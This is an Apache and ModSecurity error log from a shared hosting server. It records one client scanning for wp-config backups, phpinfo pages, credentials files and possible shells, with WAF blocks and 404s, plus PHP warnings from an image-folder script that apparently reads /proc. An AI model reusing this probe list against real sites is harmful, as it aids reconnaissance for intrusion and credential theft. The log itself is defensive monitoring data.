[Tue May 12 01:59:26.040178 2026] [security2:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "domaine-de-janasse.com"] [uri "/wp-config.php.backup"] [unique_id "agJtXrOxS7i6i_mT2NK9SAAAAEw"]
[Tue May 12 01:59:26.040344 2026] [security2:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "domaine-de-janasse.com"] [uri "/wp-config.php.backup"] [unique_id "agJtXrOxS7i6i_mT2NK9SAAAAEw"]
[Tue May 12 01:59:26.040568 2026] [security2:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "domaine-de-janasse.com"] [uri "/wp-config.php.backup"] [unique_id "agJtXrOxS7i6i_mT2NK9SAAAAEw"]
[Tue May 12 01:59:26.168233 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/aa.php
[Tue May 12 01:59:26.168317 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:26.282490 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/abcd.php
[Tue May 12 01:59:26.282558 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:26.373490 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/a2.php
[Tue May 12 01:59:26.373554 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:26.463607 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/wp-gr.php
[Tue May 12 01:59:26.463671 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:26.601484 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/xynz1.php
[Tue May 12 01:59:26.601593 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:26.699172 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/uqcxit7i.php
[Tue May 12 01:59:26.699242 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:26.850962 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/display_info.php
[Tue May 12 01:59:26.851035 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:26.946162 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/wp-config-disabled.php
[Tue May 12 01:59:26.946234 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:27.060154 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/test_info.php
[Tue May 12 01:59:27.060225 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:27.203185 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/spip.php
[Tue May 12 01:59:27.203256 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:27.308793 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/wp-index.php
[Tue May 12 01:59:27.308866 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:27.425950 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/php-nginx.php
[Tue May 12 01:59:27.426019 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:27.560872 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/wp-config.test.php
[Tue May 12 01:59:27.560941 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:27.686439 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/op.php
[Tue May 12 01:59:27.686507 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:27.776951 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/mandrill.php
[Tue May 12 01:59:27.777021 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:27.867074 2026] [security2:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "domaine-de-janasse.com"] [uri "/backup.wp-config.php"] [unique_id "agJtX7OxS7i6i_mT2NK9WAAAAEw"]
[Tue May 12 01:59:27.867219 2026] [security2:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "domaine-de-janasse.com"] [uri "/backup.wp-config.php"] [unique_id "agJtX7OxS7i6i_mT2NK9WAAAAEw"]
[Tue May 12 01:59:27.867430 2026] [security2:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "domaine-de-janasse.com"] [uri "/backup.wp-config.php"] [unique_id "agJtX7OxS7i6i_mT2NK9WAAAAEw"]
[Tue May 12 01:59:27.958599 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/20.php
[Tue May 12 01:59:27.958674 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:28.102194 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/upload_file.php
[Tue May 12 01:59:28.102266 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:28.193151 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/aws.settings.php
[Tue May 12 01:59:28.193223 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:28.286873 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/payout.php
[Tue May 12 01:59:28.286949 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:28.385516 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/pqr.php
[Tue May 12 01:59:28.385587 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:28.475837 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/phpinfo.php
[Tue May 12 01:59:28.475911 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:28.593321 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/tmp.php
[Tue May 12 01:59:28.593394 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:28.710330 2026] [security2:error] [pid 1730207:tid 1730213] [client 43.159.62.163:55602] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agJtYDue9Sp-pIv_Bb6ErAAAAUQ"]
[Tue May 12 01:59:28.732288 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/456.php
[Tue May 12 01:59:28.732371 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:28.832453 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/new2.php
[Tue May 12 01:59:28.832547 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:28.923150 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/server.php
[Tue May 12 01:59:28.923222 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:29.013933 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/extension-info.php
[Tue May 12 01:59:29.014011 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:29.122337 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/conn_test.php
[Tue May 12 01:59:29.122409 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:29.230141 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/information.php
[Tue May 12 01:59:29.230212 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:29.375207 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/credentials.php
[Tue May 12 01:59:29.375276 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:29.489315 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/phphph.php
[Tue May 12 01:59:29.489390 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:29.580343 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/test-cgi.php
[Tue May 12 01:59:29.580418 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:29.991659 2026] [core:error] [pid 1709071:tid 1709101] [client 34.162.126.124:36194] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:59:29.991693 2026] [core:error] [pid 1709071:tid 1709101] [client 34.162.126.124:36194] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:59:30.215821 2026] [core:error] [pid 1730207:tid 1730217] [client 34.162.126.124:36204] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:59:30.215863 2026] [core:error] [pid 1730207:tid 1730217] [client 34.162.126.124:36204] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:59:30.436596 2026] [core:error] [pid 1709071:tid 1709111] [client 34.162.126.124:36218] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:59:30.436618 2026] [core:error] [pid 1709071:tid 1709111] [client 34.162.126.124:36218] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:59:30.662186 2026] [core:error] [pid 1730175:tid 1730197] [client 34.162.126.124:36234] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:59:30.662219 2026] [core:error] [pid 1730175:tid 1730197] [client 34.162.126.124:36234] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:59:30.886584 2026] [core:error] [pid 1691274:tid 1691287] [client 34.162.126.124:36246] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:59:30.886612 2026] [core:error] [pid 1691274:tid 1691287] [client 34.162.126.124:36246] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:59:31.108640 2026] [core:error] [pid 1730207:tid 1730226] [client 34.162.126.124:36262] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:59:31.108683 2026] [core:error] [pid 1730207:tid 1730226] [client 34.162.126.124:36262] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:59:31.452670 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/twin.php
[Tue May 12 01:59:31.452752 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:31.545218 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/pi.php7
[Tue May 12 01:59:31.545287 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:31.659166 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/display_phpinfo.php
[Tue May 12 01:59:31.659235 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:31.749905 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/webserver-info.php
[Tue May 12 01:59:31.749974 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:31.900551 2026] [security2:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "domaine-de-janasse.com"] [uri "/new-wp-config.php"] [unique_id "agJtY7OxS7i6i_mT2NK9dgAAAEw"]
[Tue May 12 01:59:31.900703 2026] [security2:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "domaine-de-janasse.com"] [uri "/new-wp-config.php"] [unique_id "agJtY7OxS7i6i_mT2NK9dgAAAEw"]
[Tue May 12 01:59:31.900921 2026] [security2:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "domaine-de-janasse.com"] [uri "/new-wp-config.php"] [unique_id "agJtY7OxS7i6i_mT2NK9dgAAAEw"]
[Tue May 12 01:59:32.003774 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/env-info.php
[Tue May 12 01:59:32.003839 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:32.104910 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/moderator.php
[Tue May 12 01:59:32.104976 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:32.195177 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/23.php
[Tue May 12 01:59:32.195244 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:33.012391 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/summary.php
[Tue May 12 01:59:33.012462 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:33.102682 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/globals.php
[Tue May 12 01:59:33.102749 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:33.229547 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/evil.php
[Tue May 12 01:59:33.229616 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:36.632540 2026] [security2:error] [pid 1707624:tid 1707695] [client 43.128.104.75:40808] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/galerie-chien.php"] [unique_id "agJtaLOxS7i6i_mT2NK9lwAAAE0"]
[Tue May 12 01:59:37.642527 2026] [security2:error] [pid 1730207:tid 1730212] [client 49.51.204.74:54312] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.homin.fr"] [uri "/"] [unique_id "agJtaTue9Sp-pIv_Bb6EtAAAAUM"]
[Tue May 12 01:59:39.318251 2026] [security2:error] [pid 1730175:tid 1730196] [client 49.51.204.74:55812] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.homin.fr"] [uri "/fr/"] [unique_id "agJta3o6NvB9WXx5V-5wjwAAARM"], referer: http://www.homin.fr
[Tue May 12 01:59:40.152136 2026] [cgid:error] [pid 1709071:tid 1709103] [client 91.137.27.140:7005] Script timed out before returning headers: ea-php74
[Tue May 12 01:59:58.502539 2026] [authz_core:error] [pid 1730175:tid 1730192] [client 51.75.119.165:43908] AH01630: client denied by server configuration: /home/piregwan/public_html/flb/images/error_log
[Tue May 12 01:59:59.996741 2026] [authz_core:error] [pid 1730175:tid 1730192] [client 51.75.119.165:43908] AH01630: client denied by server configuration: /home/piregwan/public_html/flb/images/error_log
[Tue May 12 02:00:01.546350 2026] [authz_core:error] [pid 1730175:tid 1730192] [client 51.75.119.165:43908] AH01630: client denied by server configuration: /home/piregwan/public_html/flb/images/error_log
[Tue May 12 02:00:03.114010 2026] [authz_core:error] [pid 1730175:tid 1730192] [client 51.75.119.165:43908] AH01630: client denied by server configuration: /home/piregwan/public_html/flb/images/error_log
[Tue May 12 02:00:09.070465 2026] [security2:error] [pid 1730175:tid 1730188] [client 86.105.185.64:61709] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJtiXo6NvB9WXx5V-5wpgAAAQs"], referer: https://www.piregwan-genesis.com/
PHP Warning:  filesize(): stat failed for /proc/1705331/task/1705336/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705331/task/1705336/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705331/task/1705336/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705331/task/1705336/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705331/task/1705336/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705331/task/1705336/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:00:48.752994 2026] [security2:error] [pid 1709071:tid 1709109] [client 43.153.35.128:48296] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/embed/"] [unique_id "agJtsLvMumyrWMfSu7qfmAAAANY"]
